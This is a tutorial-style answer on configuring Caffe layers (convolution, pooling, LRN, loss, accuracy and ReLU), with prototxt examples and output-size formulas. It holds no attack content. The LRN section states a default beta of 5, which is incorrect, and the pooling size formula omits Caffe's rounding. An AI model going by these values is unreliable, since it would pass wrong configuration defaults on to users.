How to configure each layer in Caffe

2025-03-16 17:25:06
Recommended answer (1)
Answer 1:

1. Vision Layers
1.1 Convolution Layer
Type: CONVOLUTION
Example:

layers { name: "conv1" type: CONVOLUTION bottom: "data" top: "conv1" blobs_lr: 1 # learning rate multiplier for the filters blobs_lr: 2 # learning rate multiplier for the biases weight_decay: 1 # weight decay multiplier for the filters weight_decay: 0 # weight decay multiplier for the biases convolution_param { num_output: 96 # learn 96 filters kernel_size: 11 # each filter is 11x11 stride: 4 # step 4 pixels between each filter application weight_filler { type: "gaussian" # initialize the filters from a Gaussian std: 0.01 # distribution with stdev 0.01 (default mean: 0) } bias_filler { type: "constant" # initialize the biases to zero (0) value: 0 } }}

blobs_lr: learning-rate multipliers. In the example above, the weights learn at the rate the solver gives at runtime, while the bias learning rate is twice that of the weights.
weight_decay: weight-decay multipliers. In the example above, the filters are regularized but the biases are not (their multiplier is 0).

Important parameters of the convolution layer
Required parameters:
num_output (c_o): the number of filters
kernel_size (or kernel_h and kernel_w): the size of each filter

Optional parameters:
weight_filler [default type: 'constant' value: 0]: initialization method for the filters
bias_filler: initialization method for the biases
bias_term [default true]: whether to learn and apply a bias term
pad (or pad_h and pad_w) [default 0]: the number of pixels to add to each side of the input
stride (or stride_h and stride_w) [default 1]: the stride with which the filters are applied
group (g) [default 1]: if g > 1, we restrict the connectivity of each filter to a subset of the input. Specifically, the input and output channels are separated into g groups, and the i-th output group channels will only be connected to the i-th input group channels.

Output size after convolution:
Input: n * c_i * h_i * w_i
Output: n * c_o * h_o * w_o, where h_o = (h_i + 2 * pad_h - kernel_h) / stride_h + 1, and w_o is computed the same way.
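As a worked example (the 227 x 227 input size is an assumption, matching the typical AlexNet setup rather than anything stated above), the conv1 layer above with kernel_size 11, stride 4, and pad 0 gives

  h_o = (227 + 2 * 0 - 11) / 4 + 1 = 55

so an n * 3 * 227 * 227 input would produce an n * 96 * 55 * 55 output.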

1.2 Pooling Layer
Type: POOLING
Example:
layers { name: "pool1" type: POOLING bottom: "conv1" top: "pool1" pooling_param { pool: MAX kernel_size: 3 # pool over a 3x3 region stride: 2 # step two pixels (in the bottom blob) between pooling regions }}

Important parameters of the pooling layer
Required parameters:
kernel_size (or kernel_h and kernel_w): the size of each pooling region

Optional parameters:
pool [default MAX]: the pooling method; currently MAX, AVE, and STOCHASTIC are available
pad (or pad_h and pad_w) [default 0]: the number of pixels to add to each side of the input
stride (or stride_h and stride_w) [default 1]: the stride between pooling regions

Output size after pooling:
Input: n * c * h_i * w_i
Output: n * c * h_o * w_o (pooling operates on each channel independently, so the channel count is unchanged), where h_o = (h_i + 2 * pad_h - kernel_h) / stride_h + 1, and w_o is computed the same way.
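Continuing the assumed AlexNet-style numbers from the convolution example: applying the pool1 layer above (kernel_size 3, stride 2, pad 0) to a 55 x 55 input gives

  h_o = (55 + 2 * 0 - 3) / 2 + 1 = 27

so an n * 96 * 55 * 55 input would produce an n * 96 * 27 * 27 output.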

1.3 Local Response Normalization (LRN)
Type: LRN
Local Response Normalization normalizes over a local region of the input: each activation a is divided by a normalization term (the denominator below) to produce a new activation b. It comes in two forms: in one the local region extends across adjacent channels (cross-channel LRN), in the other it is a spatial region within a single channel (within-channel LRN).
Formula: each input value is divided by (1 + (alpha / n) * sum_i x_i^2)^beta, where n is the size of the local region and the sum is taken over the region centered at that value.

Optional parameters:
local_size [default 5]: for cross-channel LRN, the number of adjacent channels to sum over; for within-channel LRN, the side length of the square spatial region to sum over
alpha [default 1]: the scaling parameter
beta [default 5]: the exponent
norm_region [default ACROSS_CHANNELS]: which form of LRN to use, ACROSS_CHANNELS or WITHIN_CHANNEL
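No example is given above for this layer; the following sketch uses the same old-style prototxt syntax, with parameter values taken from the well-known AlexNet configuration (the bottom/top blob names are illustrative):

layers {
  name: "norm1"
  type: LRN
  bottom: "pool1"
  top: "norm1"
  lrn_param {
    local_size: 5 # sum over 5 adjacent channels
    alpha: 0.0001 # scaling parameter
    beta: 0.75    # exponent
    # norm_region is left at its default, ACROSS_CHANNELS
  }
}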

2. Loss Layers
Deep learning drives learning by minimizing the loss between the output and the target.

2.1 Softmax
Type: SOFTMAX_LOSS
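No example is given for this type; here is a minimal sketch in the same old-style syntax, reusing the hypothetical "pred" and "label" blob names from the hinge example below. SOFTMAX_LOSS computes the multinomial logistic loss of the softmax of its input, combining both steps in one layer for numerical stability:

layers {
  name: "loss"
  type: SOFTMAX_LOSS
  bottom: "pred"  # raw, unnormalized class scores
  bottom: "label" # ground-truth class indices
  top: "loss"
}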

2.2 Sum-of-Squares / Euclidean
Type: EUCLIDEAN_LOSS
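Again no example is given; a minimal sketch, assuming two equally-sized bottom blobs with the hypothetical names "pred" and "target". The layer computes the sum-of-squares difference between its two inputs:

layers {
  name: "loss"
  type: EUCLIDEAN_LOSS
  bottom: "pred"   # predictions
  bottom: "target" # regression targets, same dimensions as "pred"
  top: "loss"
}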

2.3 Hinge / Margin
Type: HINGE_LOSS
Example:

# L1 Norm
layers {
  name: "loss"
  type: HINGE_LOSS
  bottom: "pred"
  bottom: "label"
}

# L2 Norm
layers {
  name: "loss"
  type: HINGE_LOSS
  bottom: "pred"
  bottom: "label"
  top: "loss"
  hinge_loss_param {
    norm: L2
  }
}

Optional parameters:
norm [default L1]: the norm to use, L1 or L2

Input:
n * c * h * w (predictions)
n * 1 * 1 * 1 (labels)
Output:
1 * 1 * 1 * 1 (computed loss)

2.4 Sigmoid Cross-Entropy
Type: SIGMOID_CROSS_ENTROPY_LOSS
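A minimal sketch with hypothetical blob names; like SOFTMAX_LOSS, this layer combines the sigmoid with the cross-entropy computation for numerical stability, and both bottoms must have the same dimensions:

layers {
  name: "loss"
  type: SIGMOID_CROSS_ENTROPY_LOSS
  bottom: "pred"   # raw scores (before the sigmoid)
  bottom: "target" # per-element targets, same dimensions as "pred"
  top: "loss"
}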

2.5 Infogain
Type: INFOGAIN_LOSS
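A minimal sketch with hypothetical blob and file names. INFOGAIN_LOSS generalizes the multinomial logistic loss with an infogain matrix H, which can be loaded from a file via infogain_loss_param:

layers {
  name: "loss"
  type: INFOGAIN_LOSS
  bottom: "prob"  # predicted probability distribution (e.g. from a SOFTMAX layer)
  bottom: "label" # ground-truth class indices
  top: "loss"
  infogain_loss_param {
    source: "infogain_H.binaryproto" # hypothetical path to the H matrix
  }
}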

2.6 Accuracy and Top-k
Type: ACCURACY
Computes the accuracy of the output with respect to the target. In fact this is not a loss, and it has no backward step.
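A minimal sketch in the same old-style syntax, with hypothetical blob names. Accuracy is usually evaluated only in the test phase, and the top_k field of accuracy_param turns it into a top-k accuracy:

layers {
  name: "accuracy"
  type: ACCURACY
  bottom: "pred"  # class scores
  bottom: "label" # ground-truth class indices
  top: "accuracy"
  accuracy_param {
    top_k: 5 # count a prediction as correct if the label is among the top 5 scores
  }
  include: { phase: TEST } # only evaluate during testing
}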
3. Activation / Neuron Layers
In general, activation layers are element-wise operations that take one bottom blob and produce one top blob of the same size, usually applying a nonlinear function.
3.1 ReLU / Rectified-Linear and Leaky-ReLU
Type: RELU
Example:

layers { name: "relu1" type: RELU bottom: "conv1" top: "conv1"}

Optional parameters:
negative_slope [default 0]: the slope used for negative inputs; for x <= 0 the output is negative_slope * x.

ReLU is currently the most widely used activation function, mainly because it converges faster while delivering comparable accuracy.
The standard ReLU function is max(x, 0); in general the layer outputs x when x > 0 and negative_slope * x when x <= 0. The RELU layer supports in-place computation, meaning the bottom and top blob can be the same, which avoids extra memory consumption.
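A minimal sketch of the leaky-ReLU variant, setting negative_slope via relu_param (the 0.01 value is an illustrative choice, not from the original text):

layers {
  name: "relu1"
  type: RELU
  bottom: "conv1"
  top: "conv1" # in-place: top and bottom share the same blob
  relu_param {
    negative_slope: 0.01 # output 0.01 * x for x <= 0 instead of 0
  }
}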
